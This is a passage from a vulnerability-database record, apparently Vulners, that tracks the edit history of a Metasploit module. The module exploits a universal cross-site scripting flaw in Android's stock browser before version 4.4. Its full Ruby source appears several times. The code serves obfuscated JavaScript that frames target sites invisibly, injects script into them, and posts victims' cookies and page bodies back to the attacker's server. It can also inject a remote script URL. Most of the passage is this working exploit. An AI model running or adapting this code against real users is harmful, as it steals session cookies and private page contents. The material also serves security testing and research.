module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-12T10:43:45", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SCADA/PCOM_COMMAND", "MSF:AUXILIARY/GATHER/CISCO_RV320_CONFIG"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891670", "OPENVAS:1361412562310891666", "OPENVAS:1361412562310891669", "OPENVAS:1361412562310704388", "OPENVAS:1361412562310704387", "OPENVAS:1361412562310843904", "OPENVAS:1361412562310814670", "OPENVAS:1361412562310843903", "OPENVAS:1361412562310875445", "OPENVAS:1361412562310843901"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2D06CECA2192DFF0EED67EAC5413CB11"]}, {"type": "securelist", "idList": ["SECURELIST:067DB0A9978063CEC1E7506882CBB27E"]}], "modified": "2019-02-12T10:43:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-12T10:43:45", "differentElements": ["modified", "published"], "edition": 63}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "6e872c0bb2ab042e21a220e7df9966e5", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-16T10:55:23", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "nessus", "idList": ["SLACKWARE_SSA_2019-045-01.NASL", "SLACKWARE_SSA_2019-044-01.NASL", "SLACKWARE_SSA_2019-043-01.NASL", "DEBIAN_DLA-1672.NASL", "FEDORA_2019-333A7AA511.NASL", "FEDORA_2019-96AC060AF3.NASL", "ILO_HPESBHF_03769.NASL", "FEDORA_2019-8F2B27EFCE.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1178CCB9372CAC4B51B74F0063AE3F63"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891672", "OPENVAS:1361412562310891673", "OPENVAS:1361412562310704390", "OPENVAS:1361412562310891674", "OPENVAS:1361412562310704389", "OPENVAS:1361412562310891671", "OPENVAS:1361412562310891670", "OPENVAS:1361412562310891666", "OPENVAS:1361412562310891669"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SCADA/PCOM_COMMAND"]}, {"type": "threatpost", "idList": ["THREATPOST:CDABE9F22A062EE95B2025F63B6FB594"]}], "modified": "2019-02-16T10:55:23"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-16T10:55:23", "differentElements": ["modified", "published"], "edition": 64}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-16T12:55:42", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "nessus", "idList": ["SLACKWARE_SSA_2019-045-01.NASL", "SLACKWARE_SSA_2019-044-01.NASL", "SLACKWARE_SSA_2019-043-01.NASL", "DEBIAN_DLA-1672.NASL", "FEDORA_2019-333A7AA511.NASL", "FEDORA_2019-96AC060AF3.NASL", "ILO_HPESBHF_03769.NASL", "FEDORA_2019-8F2B27EFCE.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1178CCB9372CAC4B51B74F0063AE3F63"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891672", "OPENVAS:1361412562310891673", "OPENVAS:1361412562310704390", "OPENVAS:1361412562310891674", "OPENVAS:1361412562310704389", "OPENVAS:1361412562310891670", "OPENVAS:1361412562310891671", "OPENVAS:1361412562310891666", "OPENVAS:1361412562310891669"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SCADA/PCOM_COMMAND"]}, {"type": "threatpost", "idList": ["THREATPOST:CDABE9F22A062EE95B2025F63B6FB594"]}], "modified": "2019-02-16T12:55:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-16T12:55:42", "differentElements": ["sourceData"], "edition": 65}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "7ada51750c1931e0ef44c393072b2a22", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-21T03:40:42", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1917035265467807555"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3077F0EE1977D22F0CA69194665A52BB"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891684", "OPENVAS:1361412562310891685", "OPENVAS:1361412562310891681", "OPENVAS:1361412562310704396", "OPENVAS:1361412562310891683", "OPENVAS:1361412562310891682", "OPENVAS:1361412562310704393", "OPENVAS:1361412562310891679", "OPENVAS:1361412562310891678", "OPENVAS:1361412562310704394"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-4549"]}, {"type": "nessus", "idList": ["SLACKWARE_SSA_2019-045-01.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1178CCB9372CAC4B51B74F0063AE3F63"]}], "modified": "2019-02-21T03:40:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-21T03:40:42", "differentElements": ["sourceData"], "edition": 66}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-02-21T05:40:31", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1917035265467807555"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3077F0EE1977D22F0CA69194665A52BB"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891684", "OPENVAS:1361412562310891685", "OPENVAS:1361412562310891681", "OPENVAS:1361412562310704396", "OPENVAS:1361412562310891682", "OPENVAS:1361412562310891683", "OPENVAS:1361412562310891679", "OPENVAS:1361412562310704393", "OPENVAS:1361412562310891678", "OPENVAS:1361412562310704394"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-4549"]}, {"type": "nessus", "idList": ["SLACKWARE_SSA_2019-045-01.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1178CCB9372CAC4B51B74F0063AE3F63"]}], "modified": "2019-02-21T05:40:31"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-21T05:40:31", "differentElements": ["sourceData"], "edition": 67}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "7ada51750c1931e0ef44c393072b2a22", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-02T07:57:37", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-32462", "1337DAY-ID-32461", "1337DAY-ID-32459", "1337DAY-ID-32457", "1337DAY-ID-32460", "1337DAY-ID-32456", "1337DAY-ID-32463", "1337DAY-ID-32455", "1337DAY-ID-32453", "1337DAY-ID-32452"]}, {"type": "kitploit", "idList": ["KITPLOIT:358333751727618768", "KITPLOIT:6305301433518983839"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152305"]}, {"type": "myhack58", "idList": ["MYHACK58:62201993392"]}, {"type": "threatpost", "idList": ["THREATPOST:0B3F568CF532B4D11A2D561F09E1490F"]}, {"type": "slackware", "idList": ["SSA-2019-086-01"]}], "modified": "2019-04-02T07:57:37"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-04-02T07:57:37", "differentElements": ["sourceData"], "edition": 68}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-02T09:57:18", "history": [], "viewCount": 71, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-32462", "1337DAY-ID-32459", "1337DAY-ID-32461", "1337DAY-ID-32457", "1337DAY-ID-32460", "1337DAY-ID-32456", "1337DAY-ID-32463", "1337DAY-ID-32455", "1337DAY-ID-32453", "1337DAY-ID-32452"]}, {"type": "kitploit", "idList": ["KITPLOIT:358333751727618768", "KITPLOIT:6305301433518983839"]}, {"type": "packetstorm", "idList": 